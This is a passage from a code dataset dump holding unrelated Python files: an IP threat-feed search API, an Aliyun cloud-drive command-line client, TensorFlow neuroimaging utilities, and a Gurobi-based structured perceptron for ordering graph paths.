FeedsAlchemy()\r\nGeneral = General()\r\n\r\nGeneral.logger.info(\"API instance successfully started\")\r\n\r\n\r\n@hug.post(\"/search\", output=hug.output_format.json, version=1)\r\ndef search(body):\r\n \"\"\"Search IP in all available feeds. Input: a string containing IP addresses separated by commas in HTTP POST body\"\"\"\r\n\r\n try:\r\n payload = body.read().decode(\"utf-8\")\r\n except AttributeError:\r\n payload = body\r\n\r\n try:\r\n request_list = payload.split(\",\")\r\n\r\n for request in request_list:\r\n if General.validate_request(request):\r\n pass\r\n else:\r\n return {\"errors\": \"Data validation error in '%s'\" % request}\r\n\r\n return FeedsAlchemy.db_search_data(list(set(request_list)))\r\n\r\n except AttributeError:\r\n\r\n return {\"errors\": \"Error while searching occurred\"}\r\n\r\n\r\n@hug.get(\"/feeds\", output=hug.output_format.json, version=1)\r\ndef categories():\r\n \"\"\"Retrieve all information about feeds\"\"\"\r\n\r\n return FeedsAlchemy.db_feeds()\r\n\r\n\r\n@hug.get(\"/feeds/categories\", output=hug.output_format.json, version=1)\r\ndef categories():\r\n \"\"\"Retrieve all feed categories\"\"\"\r\n\r\n return FeedsAlchemy.db_categories()\r\n\r\n\r\n@hug.get(\"/feeds/maintainers\", output=hug.output_format.json, version=1)\r\ndef maintainers():\r\n \"\"\"Retrieve all feed maintainers\"\"\"\r\n\r\n return FeedsAlchemy.db_all_maintainers()\r\n\r\n\r\n@hug.get(\"/feed/info\", output=hug.output_format.json, examples=\"feed_name=hphosts_psh\", version=1)\r\ndef feed_info(feed_name: hug.types.text):\r\n \"\"\"Retrieve all available information about the feed by its name\"\"\"\r\n\r\n feed_name_lower = feed_name.lower()\r\n\r\n return FeedsAlchemy.db_feed_info(feed_name_lower)\r\n\r\n\r\n@hug.get(\"/maintainer/info\", output=hug.output_format.json, examples=\"maintainer=hpHosts\", version=1)\r\ndef maintainer_info(maintainer: hug.types.text):\r\n \"\"\"Retrieve all available information about the maintainer by its name\"\"\"\r\n\r\n maintainer_lower = maintainer.lower()\r\n\r\n return FeedsAlchemy.db_maintainer_info(maintainer_lower)\r\n\r\n\r\n@hug.get(\"/maintainers/by_category\", output=hug.output_format.json, examples=\"category=spam\", version=1)\r\ndef maintainer_info(category: hug.types.text):\r\n \"\"\"Retrieve all maintainers by category\"\"\"\r\n\r\n category = category.lower()\r\n\r\n return FeedsAlchemy.db_maintainers(category)\r\n\r\n\r\n@hug.get(\"/ip/bulk/by_category\", output=hug.output_format.json, examples=\"category=reputation\", version=1)\r\ndef ip_bulk(category: hug.types.text):\r\n \"\"\"Retrieve all IP addresses that are in feeds by feed category\"\"\"\r\n\r\n category_lower = category.lower()\r\n\r\n return FeedsAlchemy.db_ip_bulk(category_lower)\r\n","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"81357970","text":"import os\nimport requests\nfrom aliyunpan.api.core import AliyunPan\nfrom aliyunpan.api.models import *\nfrom aliyunpan.api.req import *\nfrom aliyunpan.api.utils import *\nfrom aliyunpan.cli.config import Config\nfrom aliyunpan.common import *\nfrom aliyunpan.exceptions import InvalidRefreshToken, InvalidPassword, LoginFailed, InvalidConfiguration, \\\n ConfigurationFileNotFoundError\n\n__all__ = ['Commander']\n\n\nclass Commander:\n def __init__(self):\n self._disk = AliyunPan()\n self._path_list = PathList(self._disk)\n self._req = Req()\n self._config = Config()\n self._task_config = Config(ROOT_DIR / Path('tasks.yaml'))\n self._share_link = 'aliyunpan://'\n self._print = Printer()\n GLOBAL_VAR.tasks = self._task_config.read()\n GLOBAL_VAR.txt = ''\n\n def __del__(self):\n self._task_config.write(GLOBAL_VAR.tasks)\n\n def init(self, config_file='~/.config/aliyunpan.yaml', refresh_token=None, username=None, password=None, depth=3):\n self._path_list.depth = depth\n specify_conf_file = os.environ.get(\"ALIYUNPAN_CONF\", \"\")\n config_file = list(\n filter(lambda x: Path(x).is_file(), map(lambda x: Path(x).expanduser(), [specify_conf_file, config_file])))\n if refresh_token:\n if not len(refresh_token) == 32:\n raise InvalidRefreshToken\n self._disk.refresh_token = refresh_token\n elif username:\n if not password:\n raise InvalidPassword\n if not self._disk.login(username, password):\n raise LoginFailed\n elif config_file:\n self._config.config_file = config_file[0]\n refresh_token = self._config.get('refresh_token')\n username = self._config.get('username')\n password = self._config.get('password')\n if refresh_token:\n if not len(refresh_token) == 32:\n raise InvalidRefreshToken\n self._disk.refresh_token = refresh_token\n elif username:\n if not password:\n raise InvalidPassword\n if not self._disk.login(username, password):\n raise LoginFailed\n else:\n raise InvalidConfiguration\n else:\n raise ConfigurationFileNotFoundError\n\n def ls(self, path, l):\n for i in self._path_list.get_path_list(path, update=False):\n if l:\n if i.type:\n print(str_of_size(i.size), time.strftime('%d %b %H:%M', i.ctime), i.id, i.name)\n else:\n print('-', time.strftime('%d %b %H:%M', i.ctime), i.id, i.name)\n else:\n print(i.name, end='\\t')\n\n def tree(self, path='root'):\n return self._path_list.tree(path)\n\n def rm(self, path):\n file_id = self._path_list.get_path_fid(path, update=False)\n if not file_id:\n raise FileNotFoundError(path)\n file_id_ = self._disk.delete_file(file_id)\n if file_id_ == file_id:\n self._path_list._tree.remove_node(file_id)\n self._print.remove_info(path, status=False)\n return file_id_\n\n def mv(self, path, target_path):\n file_id = self._path_list.get_path_fid(path, update=False)\n _ = self._disk.move_file(self._path_list.get_path_fid(path, update=False),\n self._path_list.get_path_fid(target_path, update=False))\n if _ and file_id:\n self._print.move_info(path, target_path, status=True)\n self._path_list._tree.remove_node(file_id)\n self._path_list.update_path_list(Path(target_path) / path, is_fid=False)\n else:\n self._print.move_info(path, target_path, status=False)\n return _\n\n def mkdir(self, path):\n file_id_list = []\n path = PurePosixPath(Path(path).as_posix())\n if str(path) == 'root':\n return file_id_list\n file_id = self._path_list.get_path_fid(path, update=False)\n if file_id and file_id != 'root':\n return file_id_list\n parent_file_id = self._path_list.get_path_fid(path.parent, update=False)\n if not parent_file_id:\n file_id_list.extend(self.mkdir(path.parent))\n parent_file_id, _ = file_id_list[-1]\n r = self._disk.create_file(path.name, parent_file_id)\n try:\n file_id = r.json()['file_id']\n except KeyError:\n logger.debug(r.json()['message'])\n return False\n if file_id:\n self._print.mkdir_info(path, status=True)\n self._path_list._tree.create_node(tag=path.name, identifier=file_id, parent=parent_file_id)\n file_id_list.append((file_id, path))\n return file_id_list\n\n def upload(self, path, upload_path='root', timeout=10.0, retry=3, force=False, share=False, chunk_size=None,\n c=False):\n if isinstance(path, str):\n path_list = (path,)\n else:\n path_list = path\n result_list = []\n for path in path_list:\n if path:\n if self._share_link in path:\n share_list = []\n if share:\n share_info = parse_share_url(path)\n file = self._path_list.get_path_node(share_info.name, update=False)\n if file and not file.data.type:\n path = path.replace(share_info.name, share_info.name + str(int(time.time())))\n share_info = parse_share_url(path)\n if not self._path_list.get_path_fid(share_info.name, update=False):\n self.upload_share(share_info)\n self._path_list.update_path_list(depth=0)\n if share_info.path == 'root':\n path_ = share_info.name\n else:\n path_ = share_info.path / share_info.name\n for line in self.cat(path_).split('\\n'):\n if line.startswith(self._share_link):\n share_list.append(parse_share_url(line))\n self.rm(path_)\n if upload_path == 'root':\n upload_path = share_info.path\n else:\n upload_path /= share_info.path\n else:\n share_list = parse_share_url(path)\n return self.upload_share(share_list, upload_path, force)\n path = Path(path)\n if path.is_file():\n if share:\n share_list = []\n with open(path, 'r', encoding='utf-8') as f:\n while True:\n line = f.readline()\n if not line:\n break\n if line.startswith(self._share_link):\n share_list.append(parse_share_url(line))\n return self.upload_share(share_list, upload_path, force)\n else:\n try:\n file_id = self._disk.upload_file(\n parent_file_id=self._path_list.get_path_fid(upload_path, update=False), path=path,\n upload_timeout=timeout, retry_num=retry, force=force, chunk_size=chunk_size, c=c)\n except KeyboardInterrupt:\n self.__del__()\n raise\n result_list.append(file_id)\n elif path.is_dir():\n if upload_path == 'root':\n upload_path = '/'\n upload_path = Path(upload_path)\n upload_file_list = self.upload_dir(path, upload_path)\n for file in upload_file_list:\n try:\n result = self._disk.upload_file(\n parent_file_id=self._path_list.get_path_fid(file[0], update=False), path=file[1],\n upload_timeout=timeout, retry_num=retry, force=force, chunk_size=chunk_size, c=c)\n except KeyboardInterrupt:\n self.__del__()\n raise\n result_list.append(result)\n else:\n raise FileNotFoundError\n for file_hash, path in GLOBAL_VAR.file_set:\n if file_hash in GLOBAL_VAR.tasks and GLOBAL_VAR.tasks[file_hash].upload_time:\n if isinstance(GLOBAL_VAR.tasks[file_hash].path, str):\n del GLOBAL_VAR.tasks[file_hash]\n else:\n try:\n GLOBAL_VAR.tasks[file_hash].path.remove(path)\n except ValueError:\n pass\n if not GLOBAL_VAR.tasks[file_hash].path:\n del GLOBAL_VAR.tasks[file_hash]\n if len(result_list) == 1:\n result_list = result_list[0]\n return result_list\n\n def upload_dir(self, path, upload_path):\n upload_path = upload_path / path.name\n if not self._path_list.get_path_fid(upload_path, update=False):\n self.mkdir(upload_path)\n upload_file_list = []\n for file in path.iterdir():\n if file.is_dir():\n upload_file_list.extend(self.upload_dir(file, upload_path))\n else:\n upload_file_list.append([upload_path, file])\n return upload_file_list\n\n def upload_share(self, share_info_list: ShareInfo, upload_path='root', force=False):\n if not isinstance(share_info_list, list):\n share_info_list = [share_info_list]\n if upload_path == 'root':\n upload_path = ''\n upload_path = PurePosixPath(Path(upload_path).as_posix())\n folder_list = []\n file_list = []\n for share_info in share_info_list:\n file_id_list = self.mkdir(upload_path / share_info.path)\n if file_id_list:\n for file_id, path in file_id_list:\n folder_list.append((file_id, upload_path / path))\n folder_list = tuple(set(folder_list))\n for share_info in share_info_list:\n path = share_info.path\n if not str(upload_path) and str(path) == 'root':\n path = Path('')\n parent_file_id = self._path_list.get_path_fid(upload_path / path)\n result = self._disk.save_share_link(share_info.name, share_info.content_hash, share_info.content_hash_name,\n share_info.size, parent_file_id, force)\n p = PurePosixPath(Path(upload_path / path / share_info.name).as_posix())\n file_list.append((result, p))\n if result:\n self._print.upload_info(p, status=True, rapid_upload=True)\n else:\n self._print.upload_info(p, status=False)\n return folder_list, file_list\n\n def download(self, path, save_path=None, single_file=False, share=False):\n if not save_path:\n save_path = Path().cwd()\n save_path = Path(save_path)\n if isinstance(path, str):\n path_list = (path,)\n else:\n path_list = path\n for path in path_list:\n if str(path).startswith(self._share_link) or share:\n folder_list, file_list = self.upload(path, share=share)\n folder_list = sorted(folder_list, key=lambda x: x[1])\n for file_id, path in folder_list:\n p = save_path / path\n try:\n p.mkdir(parents=True)\n self._print.mkdir_info(p, status=True)\n except FileExistsError:\n pass\n for file_id, path in file_list:\n self.download_file(save_path / path, self._disk.get_download_url(file_id))\n for file_id, path in file_list:\n self._path_list.update_path_list(path.parent, depth=0, is_fid=False)\n try:\n self.rm(path)\n except FileNotFoundError:\n pass\n for file_id, path in folder_list:\n try:\n self.rm(path)\n except FileNotFoundError:\n pass\n continue\n if isinstance(path, (Path, PurePosixPath, str)):\n path = PurePosixPath(Path(path).as_posix())\n node = self._path_list.get_path_node(path, update=False)\n if not node:\n raise FileNotFoundError(path)\n file_node = node.data\n self._path_list.update_path_list(file_node.id)\n if file_node.type:\n single_file = True\n else:\n file_node, path = path, path.name\n p = save_path / path\n if file_node.type:\n if single_file:\n p = save_path / p.name\n self._print.download_info(p)\n self.download_file(p, file_node.download_url)\n else:\n self.download(self._path_list.get_fid_list(file_node.id), save_path / p.name)\n\n def download_file(self, path, url):\n try:\n path.parent.mkdir(parents=True)\n self._print.mkdir_info(path.parent, status=True)\n except FileExistsError:\n pass\n if path.exists():\n temp_size = path.stat().st_size\n else:\n temp_size = 0\n headers = {'Range': 'bytes=%d-' % temp_size}\n try:\n r = self._req.get(url, headers=headers, stream=True)\n file_size = int(r.headers['Content-Length'])\n if temp_size == file_size and file_size != 0:\n self._print.download_info(path, status=True)\n return True\n elif temp_size > file_size:\n mode = 'wb'\n temp_size = 0\n else:\n mode = 'ab'\n download_bar = DownloadBar(size=file_size)\n download_bar.update(refresh_line=False)\n with path.open(mode) as f:\n for chunk in r.iter_content(chunk_size=1024):\n k = temp_size / file_size\n download_bar.update(ratio=k, refresh_line=True)\n if chunk:\n temp_size += len(chunk)\n f.write(chunk)\n except requests.exceptions.RequestException:\n self._print.download_info(path, status=False)\n return False\n self._print.download_info(path, status=True, t=download_bar.time, average_speed=download_bar.average_speed,\n refresh_line=True)\n return True\n\n def cat(self, path, encoding='utf-8'):\n file_node = self._path_list.get_path_node(path, update=False)\n if not file_node:\n raise FileNotFoundError(path)\n file = file_node.data\n self._path_list.update_path_list(file.id)\n r = self._req.get(file.download_url)\n r.encoding = encoding\n return r.text\n\n def share(self, path, file_id, expire_sec, share_link, download_link, save):\n def share_(path, file_id, parent_file=''):\n if path:\n file_node = self._path_list.get_path_node(path, update=False)\n if not file_node:\n raise FileNotFoundError(path)\n file = file_node.data\n self._path_list.update_path_list(file.id)\n else:\n file = self._path_list._tree.get_node(file_id).data\n if file.type:\n share_txt = file.name.center(50, '-') + '\\n'\n if download_link:\n share_txt += '下载链接'.center(50, '*') + '\\n'\n url = self._disk.get_download_url(file.id, expire_sec)\n share_txt += url + '\\n\\n'\n if share_link:\n share_txt += '分享链接'.center(50, '*') + '\\n'\n url = f'{self._share_link}{file.name}|{file.content_hash}|{file.size}|{parent_file or \"root\"}'\n share_txt += url + '\\n'\n share_txt += '导入链接'.center(50, '*') + '\\n'\n share_txt += f'python main.py upload \"{url}\"' + '\\n\\n'\n print(share_txt)\n GLOBAL_VAR.txt += share_txt\n else:\n for i in self._path_list.get_fid_list(file.id):\n share_(path=None, file_id=i.id, parent_file=Path(parent_file) / file.name)\n\n GLOBAL_VAR.txt += '*' * 50 + '\\n'\n GLOBAL_VAR.txt += '项目地址: https://github.com/wxy1343/aliyunpan' + '\\n'\n GLOBAL_VAR.txt += '*' * 50 + '\\n\\n'\n share_(path, file_id)\n if save:\n file_name = Path(path).name + f'{int(time.time())}.txt'\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(GLOBAL_VAR.txt)\n print('文件导入'.center(50, '*'))\n print(f'python main.py upload -s {file_name}')\n print('链接导入'.center(50, '*'))\n file_id = self.upload(file_name)\n print()\n if file_id:\n self._path_list.update_path_list(depth=1)\n file = self._path_list._tree.get_node(file_id).data\n url = f'{self._share_link}{Path(path).name}|{file.content_hash}|{file.size}|root'\n print(f'python main.py upload -s \"{url}\"')\n","sub_path":"aliyunpan/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":18004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"475045209","text":"\"\"\"\r\nCreated on Dec 29 2019\r\nCode for 3D task activation regression with convolutional networks based on resting state connectivity data\r\n@author: mregina\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport nibabel\r\n\r\n# correlation calculation for keras metric and loss classes\r\ndef calculate_correlation(y_true, y_pred, sample_weight=None):\r\n assert len(y_true.shape)==5\r\n mean_ytrue = tf.reduce_mean(y_true, keepdims=True, axis=[1,2,3,4])\r\n mean_ypred = tf.reduce_mean(y_pred, keepdims=True, axis=[1,2,3,4])\r\n\r\n demean_ytrue = y_true - mean_ytrue\r\n demean_ypred = y_pred - mean_ypred\r\n\r\n if sample_weight is not None:\r\n sample_weight = tf.broadcast_weights(sample_weight, y_true)\r\n std_y = tf.sqrt(tf.reduce_sum(sample_weight * tf.square(demean_ytrue)) * tf.reduce_sum(\r\n sample_weight * tf.square(demean_ypred)))\r\n correlation = tf.reduce_sum(sample_weight * demean_ytrue * demean_ypred) / std_y\r\n else:\r\n std_y = tf.sqrt(tf.reduce_sum(tf.square(demean_ytrue)) * tf.reduce_sum(tf.square(demean_ypred)))\r\n correlation = tf.reduce_sum(demean_ytrue * demean_ypred) / std_y\r\n return tf.maximum(tf.minimum(correlation, 1.0), -1.0)\r\n\r\n# correlation metric\r\nclass CorrelationMetric(tf.keras.metrics.Metric):\r\n def __init__(self, name=\"correlation\", **kwargs):\r\n super(CorrelationMetric, self).__init__(name, **kwargs)\r\n self.correlation = self.add_weight(name='correlation', initializer='zeros')\r\n\r\n def update_state(self, y_true, y_pred, sample_weight=None):\r\n correlation = calculate_correlation(y_true, y_pred, sample_weight)\r\n self.correlation.assign(correlation)\r\n\r\n def result(self):\r\n return self.correlation\r\n\r\n\r\n# correlation as loss function\r\nclass CorrelationLoss(tf.keras.losses.Loss):\r\n def call(self, y_true, y_pred, sample_weight=None):\r\n correlation = calculate_correlation(y_true, y_pred, sample_weight)\r\n return 1.0 - correlation\r\n\r\n\r\n# create input datasets as a sequence\r\nclass NiiSequence(tf.keras.utils.Sequence):\r\n def __init__(self, subIDs, rootpath, dataname, labelname, batch_size, shuffle=False):\r\n self.subIDs = subIDs\r\n self.batch_size = batch_size\r\n self.rootpath = rootpath\r\n self.dataname = dataname\r\n self.labelname = labelname\r\n self.shuffle = shuffle\r\n\r\n def __len__(self):\r\n return np.ceil(len(self.subIDs) / self.batch_size).astype(np.int64)\r\n\r\n def __getitem__(self, idx):\r\n if self.shuffle and idx == 0:\r\n shuffle_ids = np.arange(len(self.subIDs))\r\n np.random.shuffle(shuffle_ids)\r\n self.subIDs = np.array(self.subIDs)[shuffle_ids]\r\n subID_batch = self.subIDs[idx * self.batch_size:(idx + 1) * self.batch_size]\r\n data_batch = []\r\n label_batch = []\r\n for subID in subID_batch:\r\n data = nibabel.load(self.rootpath + subID + self.dataname).get_fdata()\r\n label = nibabel.load(self.rootpath + subID + self.labelname).get_fdata()\r\n label = np.expand_dims(label, axis=3)\r\n\r\n data_batch.append(data)\r\n label_batch.append(label)\r\n if self.batch_size>1:\r\n return np.stack(data_batch, axis=0), np.stack(label_batch, axis=0)\r\n else:\r\n return np.expand_dims(data, axis=0), np.expand_dims(label, axis=0)\r\n\r\n \r\n# save predicted images in niftii format for later tests and visual checking\r\ndef save_prediction(predicted_batch, rootpath, template_subID, labelname, batch_id=None, subIDs=None):\r\n template_img = nibabel.load(rootpath + template_subID + labelname)\r\n batch_size = predicted_batch.shape[0]\r\n for i in range(batch_size):\r\n new_img = nibabel.Nifti1Image(predicted_batch[i, :, :, :, 0], template_img.affine, template_img.header)\r\n if subIDs is not None:\r\n filename = rootpath + subIDs[i] + '_predicted' + labelname\r\n elif batch_id is not None:\r\n filename = rootpath + str(batch_id * batch_size + i) + '_predicted' + labelname\r\n else:\r\n filename = rootpath + str(i) + '_predicted' + labelname\r\n nibabel.save(new_img, filename)\r\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"353818","text":"from gurobipy import *\nimport cPickle as pickle\nimport pdb, itertools, driver, time\nimport bisect\nimport random, time, math\nimport numpy as np\nimport numpy.matlib\nimport scipy.optimize\nfrom scipy.misc import logsumexp\nrandom.seed(2)\ngurobipy.setParam(GRB.Param.MIPGap,0.01)\ngurobipy.setParam(\"OutputFlag\",0)\ngurobipy.setParam(\"Threads\",3) \ngurobipy.setParam(\"MIPFocus\",1)\n\n\nSTART_NODE = 0\nEND_NODE = 1\nFIRST_REAL_NODE = 2\n\n\ndef permute(L):\n return random.sample(L,len(L))\n #return L\n\n'''\nfind min hamiltonaian path and transitive tournament\n\ndef find_path_extended(G,weights,probs_instead_of_weights=False):\n\n # Create a new model\n m = Model(\"hamiltonian_cycle and acyclic tournament\")\n\n # Create variables\n # edges\n x_vars = {}\n # nodes\n u_vars = {}\n # new edges\n z_vars = {}\n for var1 in permute(G.vertices()):\n for var2 in permute(G.vertices()):\n if var1 != var2:\n x_vars[(var1,var2)] = m.addVar(vtype='B', name=\"x_\"+str(var1)+'_'+str(var2))\n z_vars[(var1,var2)] = m.addVar(vtype='B', name=\"z_\"+str(var1)+'_'+str(var2))\n\n u_vars[var1] = m.addVar(vtype=GRB.INTEGER, name=\"u_\"+str(var1))\n m.update()\n\n for var in G.vertices():\n if var != START_NODE:\n cur_incoming = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[1] == var)])\n #print(cur_incoming)\n m.addConstr(cur_incoming,GRB.EQUAL,1.0)\n\n if var != END_NODE:\n cur_outgoing = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[0] == var)])\n #print(cur_outgoing)\n m.addConstr(cur_outgoing,GRB.EQUAL,1.0)\n\n for var1 in G.vertices():\n for var2 in G.vertices():\n if var1 != var2:\n c = LinExpr([(1.0,u_vars[var1]),(-1.0,u_vars[var2]),(G.num_vertices(),x_vars[(var1,var2)])])\n #print(c)\n m.addConstr(c,GRB.LESS_EQUAL,G.num_vertices()-1)\n\n one_direction = LinExpr([(1.0, z_vars[(var1, var2)]),(1.0, z_vars[(var2, var1)])])\n m.addConstr(one_direction, GRB.EQUAL, 1)\n connect_vars = LinExpr([(1.0, x_vars[(var1, var2)]),(-1.0, z_vars[(var1, var2)])])\n m.addConstr(connect_vars, GRB.LESS_EQUAL, 0)\n connect_vars_inverse = LinExpr([(1.0, x_vars[(var2, var1)]),(-1.0, z_vars[(var2, var1)])])\n m.addConstr(connect_vars_inverse, GRB.LESS_EQUAL, 0)\n #rule out cycles with size 3\n for var3 in G.vertices():\n if var3 != var2 and var3 != var1:\n cycle = LinExpr([(1.0, z_vars[(var1, var2)]),(1.0, z_vars[(var2, var3)]), (1.0, z_vars[(var3, var1)])])\n inverse_cycle = LinExpr([(1.0, z_vars[(var2, var1)]),(1.0, z_vars[(var1, var3)]), (1.0, z_vars[(var3, var2)])])\n m.addConstr(cycle, GRB.LESS_EQUAL, 2)\n m.addConstr(inverse_cycle, GRB.LESS_EQUAL, 2)\n\n # Set objective\n #try:\n edge_weights = permute(G.get_edge_weights(weights))\n if probs_instead_of_weights:\n all_probs = []\n for v in G.vertices():\n if v != END_NODE:\n batch_scores = [(e,w) for e,w in edge_weights if e[0] == v]\n S = logsumexp([x[1] for x in batch_scores])\n batch_scores = [(e,np.exp(w-S)) for e,w in batch_scores]\n all_probs.extend(batch_scores)\n edge_weights = all_probs\n objective = LinExpr([(weight,x_vars[edge]) for edge,weight in edge_weights] + [(weight,z_vars[edge]) for edge,weight in edge_weights])\n #except TypeError:\n # return None\n\n m.setObjective(objective,GRB.MINIMIZE)\n code = m.optimize()\n\n try:\n return [k for k,v in x_vars.items() if v.x > 0.98]\n except GurobiError:\n return None\n'''\n\ndef find_min_hamiltonian_path(G,weights,probs_instead_of_weights=False):\n \"\"\"\n finds the minimal hamiltonian path in G between the start_node\n and the end_node. returns the set of edges participating in the\n path.\n \"\"\"\n\n # Create a new model\n m = Model(\"hamiltonian_cycle\")\n \n # Create variables\n x_vars = {}\n u_vars = {}\n for var1 in permute(G.vertices()):\n for var2 in permute(G.vertices()):\n if var1 != var2:\n x_vars[(var1,var2)] = m.addVar(vtype='B', name=\"x_\"+str(var1)+'_'+str(var2))\n u_vars[var1] = m.addVar(vtype=GRB.INTEGER, name=\"u_\"+str(var1))\n m.update()\n \n for var in G.vertices():\n if var != START_NODE:\n cur_incoming = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[1] == var)])\n #print(cur_incoming)\n m.addConstr(cur_incoming,GRB.EQUAL,1.0)\n \n if var != END_NODE:\n cur_outgoing = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[0] == var)])\n #print(cur_outgoing)\n m.addConstr(cur_outgoing,GRB.EQUAL,1.0)\n \n for var1 in G.vertices():\n for var2 in G.vertices():\n if var1 != var2:\n c = LinExpr([(1.0,u_vars[var1]),(-1.0,u_vars[var2]),(G.num_vertices(),x_vars[(var1,var2)])])\n #print(c)\n m.addConstr(c,GRB.LESS_EQUAL,G.num_vertices()-1)\n \n # Set objective\n #try:\n edge_weights = permute(G.get_edge_weights(weights))\n if probs_instead_of_weights:\n all_probs = []\n for v in G.vertices():\n if v != END_NODE:\n batch_scores = [(e,w) for e,w in edge_weights if e[0] == v]\n S = logsumexp([x[1] for x in batch_scores])\n batch_scores = [(e,np.exp(w-S)) for e,w in batch_scores]\n all_probs.extend(batch_scores)\n edge_weights = all_probs\n objective = LinExpr([(weight,x_vars[edge]) for edge,weight in edge_weights])\n #except TypeError:\n # return None\n \n m.setObjective(objective,GRB.MINIMIZE)\n m.update()\n code = m.optimize()\n \n try:\n return [k for k,v in x_vars.items() if v.x > 0.98]\n except GurobiError:\n return None\n\ndef shuffle(L1,L2):\n \"Returns a random permutation of L1 and of L2 (the same permutation)\"\n if len(L1) != len(L2):\n raise Exception('Incompatible arguments')\n perm = random.sample(range(len(L1)),len(L1))\n L1 = [L1[ind] for ind in perm]\n L2 = [L2[ind] for ind in perm]\n return L1,L2\n\n#class LocalClassifier:\n# def __init__(self,num_features,num_iters,eta,averaged,vec_feature_names):\n# def save(self,filename):\n# def fit(self,vector_graphs,perms)\n# def predict(self,event_graph)\n#def fit()\n#def predict()\n#def test_on_data(\n#def test_on_data_from_file(\n\n\n \nclass StructuredPerceptron:\n \n def __init__(self,num_features,num_iters,eta,averaged,vec_feature_names,calc_train_accuracy=False,\\\n greedy_inference=False,model_pickle=None,time_limit=5,\\\n probs_instead_of_weights=False,sigma=0.1):\n self._num_features = num_features\n self._weights = numpy.matlib.zeros(shape=(1,num_features))\n self._num_iters = num_iters\n self._averaged = averaged\n self._eta = eta\n self._vec_feature_names = vec_feature_names\n self._calc_train_acc = calc_train_accuracy\n self._greedy_inference = greedy_inference\n self._probs_insteadOf_weights = probs_instead_of_weights\n self._model_pickle = model_pickle\n self._interm_averaged_model = numpy.matlib.zeros(shape=(1,num_features))\n self._interm_averaged_model_num_instances = 0\n self._sigma = sigma\n self._gradient_iter = 0\n self._obj_iter = 0\n gurobipy.setParam(\"TimeLimit\",time_limit)\n \n def save(self,filename):\n f = open(filename,'wb')\n pickle.dump(self,f)\n f.close()\n\n def set_time_limit(self,time_limit):\n print(str(time_limit)+' time limit set')\n gurobipy.setParam(\"TimeLimit\",time_limit)\n \n def fit(self,vector_graphs,perms):\n \"\"\"\n vector_graph is a list of graphs where each edge corresponds to a vector (numpy vectors, could be sparse).\n perms is a list of permutations. Each permutation is a collection of edges in the graph.\n \"\"\"\n if self._interm_averaged_model_num_instances > 0:\n # starting from a previously saved model\n sum_weight_vectors = self._interm_averaged_model * self._interm_averaged_model_num_instances\n done_instances = self._interm_averaged_model_num_instances\n print('x')\n else:\n done_instances = 0\n sum_weight_vectors = np.zeros(shape=self._weights.shape)\n \n vector_graphs, perms = shuffle(vector_graphs,perms)\n learning_curve_pairs = [(0,0) for x in vector_graphs]\n learning_curve_triples = [(0,0) for x in vector_graphs]\n learning_curve_quads = [(0,0) for x in vector_graphs]\n exact_matches = [0 for x in vector_graphs]\n seen_instances = [0 for x in vector_graphs]\n total_instances_seen = 0\n save_gap = 5000 #000 # 5000 # the maximum number of instances between pickles\n for ind in range(self._num_iters):\n instance_index = 0\n error_instances = []\n for G,correct_perm in zip(vector_graphs,perms):\n if total_instances_seen >= done_instances:\n if self._greedy_inference:\n predicted_perm = self.greedy_inference(G)\n else:\n predicted_perm = find_min_hamiltonian_path(G,self._weights)\n if predicted_perm == None:\n continue\n self._weights = self._weights + \\\n (self._eta * ( G.get_sum_path(correct_perm) - G.get_sum_path(predicted_perm) )).todense()\n try:\n predicted_perm_c = convert_edges_perm(predicted_perm)\n correct_perm_c = convert_edges_perm(correct_perm)\n learning_curve_pairs[instance_index] = \\\n num_agreeing_tuples(predicted_perm_c,correct_perm_c,2)\n learning_curve_triples[instance_index] = \\\n num_agreeing_tuples(predicted_perm_c,correct_perm_c,3)\n learning_curve_quads[instance_index] = \\\n num_agreeing_tuples(predicted_perm_c,correct_perm_c,4)\n seen_instances[instance_index] = 1\n exact_matches[instance_index] = (1 if set(predicted_perm) == set(correct_perm) else 0) \n self.print_learning_curve(ind,instance_index,learning_curve_pairs,learning_curve_triples,\\\n learning_curve_quads,1.0*sum(exact_matches)/sum(seen_instances))\n sum_weight_vectors = sum_weight_vectors + self._weights\n except Exception:\n error_instances.append(instance_index)\n print('Incorrect decoding in training. Instance '+str(ind)+' '+str(instance_index))\n instance_index += 1\n total_instances_seen += 1\n if len(perms) > save_gap and self._model_pickle and total_instances_seen % save_gap == 0:\n self._interm_averaged_model = sum_weight_vectors / total_instances_seen\n self._interm_averaged_model_num_instances = total_instances_seen\n f_pickle = open(self._model_pickle+'_'+str(total_instances_seen)+'inst','w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n if self._calc_train_acc:\n print('Training accuracy iteration #'+str(ind)+':'+str(self.test_on_data(vector_graphs,perms)))\n if self._model_pickle:\n self._interm_averaged_model = sum_weight_vectors / ((ind+1) * len(perms))\n self._interm_averaged_model_num_instances = (ind+1) * len(perms)\n f_pickle = open(self._model_pickle+'_iter'+str(ind),'w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n if self._averaged:\n self._weights = sum_weight_vectors / (self._num_iters * len(perms))\n self._interm_averaged_model = self._weights\n self._interm_averaged_model_num_instances = (self._num_iters * len(perms))\n if self._model_pickle:\n f_pickle = open(self._model_pickle+'_averaged','w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n if self._calc_train_acc:\n print('Training accuracy (after averaging):'+str(self.test_on_data(vector_graphs,perms)))\n return error_instances\n\n def fit_mbr(self,vector_graphs,perms):\n feature_vectors = [G._vecs for G in vector_graphs]\n \n batches = [[[e_ind for e_ind,e in enumerate(G.edges()) if e[0] == v] \\\n for v in G.vertices() if v != END_NODE] for G in vector_graphs]\n\n correct_rows = []\n for G,perm in 